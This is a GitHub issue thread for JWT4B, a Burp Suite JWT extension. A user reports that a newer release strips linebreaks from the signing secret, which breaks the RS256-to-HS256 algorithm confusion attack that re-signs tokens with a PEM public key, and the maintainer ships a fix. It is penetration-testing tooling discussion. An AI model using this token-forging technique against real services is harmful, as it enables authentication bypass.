search

ozzi- / JWT4B

JWT Support for Burp
GNU General Public License v3.0
240 stars 46 forks source link

Wrong Signature #45

Closed emanuelduss closed 3 years ago

emanuelduss commented 3 years ago

Hi ozzi-

I really like this extension and use it a lot but just had some issues while creating signatures with a secret that contains linebreaks.

This is e.g. important in the algorithm confusion attack where you sign your RS256 token using the public key but using the HS265 algorithm.

Situation

Example JWT:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJpYXQiOjE2MDU3OTk4MTd9.Spvq4AvnNNd8RFTcZJr2r0re7hSxWi1XBvLSEdpBY2k

Decoded:

Headers = {
  "alg": "HS256",
  "typ": "JWT"
}

Payload = {
  "foo": "bar",
  "iat": 1605799817
}

Signature = "Spvq4AvnNNd8RFTcZJr2r0re7hSxWi1XBvLSEdpBY2k"

What I want

I get the expected result i previous versions of the extension.

I want to sign it using the following multi line secret (incl. the last linebreak!):

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA33TqqLR3eeUmDtHS89qF
3p4MP7Wfqt2Zjj3lZjLjjCGDvwr9cJNlNDiuKboODgUiT4ZdPWbOiMAfDcDzlOxA
04DDnEFGAf+kDQiNSe2ZtqC7bnIc8+KSG/qOGQIVaay4Ucr6ovDkykO5Hxn7OU7s
Jp9TP9H0JH8zMQA6YzijYH9LsupTerrY3U6zyihVEDXXOv08vBHk50BMFJbE9iwF
wnxCsU5+UZUZYw87Uu0n4LPFS9BT8tUIvAfnRXIEWCha3KbFWmdZQZlyrFw0buUE
f0YN3/Q0auBkdbDR/ES2PbgKTJdkjc/rEeM0TxvOUf7HuUNOhrtAVEN1D5uuxE1W
SwIDAQAB
-----END PUBLIC KEY-----

Doing so: image

Plugin output on stdout:

15:41:16.377 | JWT4B says hi!
15:41:34.097 | Recalculating Signature with Secret - 'a
b
'
15:53:36.827 | Recalculating Signature with Secret - '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA33TqqLR3eeUmDtHS89qF
3p4MP7Wfqt2Zjj3lZjLjjCGDvwr9cJNlNDiuKboODgUiT4ZdPWbOiMAfDcDzlOxA
04DDnEFGAf+kDQiNSe2ZtqC7bnIc8+KSG/qOGQIVaay4Ucr6ovDkykO5Hxn7OU7s
Jp9TP9H0JH8zMQA6YzijYH9LsupTerrY3U6zyihVEDXXOv08vBHk50BMFJbE9iwF
wnxCsU5+UZUZYw87Uu0n4LPFS9BT8tUIvAfnRXIEWCha3KbFWmdZQZlyrFw0buUE
f0YN3/Q0auBkdbDR/ES2PbgKTJdkjc/rEeM0TxvOUf7HuUNOhrtAVEN1D5uuxE1W
SwIDAQAB
-----END PUBLIC KEY-----
'

Screenshot: image

This works as expected.

Also CyberChef confirms that this is the correct behavior:

image

What I get

In the latest release, the attacks did not work anymore :(.

Performing the same steps as already described.

Plugin output on stdout:

15:55:18.704 | JWT4B says hi!
15:55:56.423 | Recalculating Signature with Secret - '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA33TqqLR3eeUmDtHS89qF3p4MP7Wfqt2Zjj3lZjLjjCGDvwr9cJNlNDiuKboODgUiT4ZdPWbOiMAfDcDzlOxA04DDnEFGAf+kDQiNSe2ZtqC7bnIc8+KSG/qOGQIVaay4Ucr6ovDkykO5Hxn7OU7sJp9TP9H0JH8zMQA6YzijYH9LsupTerrY3U6zyihVEDXXOv08vBHk50BMFJbE9iwFwnxCsU5+UZUZYw87Uu0n4LPFS9BT8tUIvAfnRXIEWCha3KbFWmdZQZlyrFw0buUEf0YN3/Q0auBkdbDR/ES2PbgKTJdkjc/rEeM0TxvOUf7HuUNOhrtAVEN1D5uuxE1WSwIDAQAB-----END PUBLIC KEY-----'

Screenshot: image

All linebreaks from the secret input are removed.

This results in a non-working attack :(.

Issue

Solution

Can you fix this?

Thanks & LG Mänu

ozzi- commented 3 years ago

Hi Mänu

Thank you for the exemplary issue! However, do you know if this worked with 1.12? Meaning the perpetrator is in v1.13..

Cheers

ozzi- commented 3 years ago

Commit identified https://github.com/ozzi-/JWT4B/commit/feed19960dc6e45eb0ae3a4f1e5fa11343abb506

ozzi- commented 3 years ago

Can you please see if this works? Alternatively feel free to build from the latest commit ;) JWT4B.zip

emanuelduss commented 3 years ago

Yayy

image

Awesome, THX!

ozzi- commented 3 years ago

Thanks :) https://github.com/ozzi-/JWT4B/releases/tag/1.14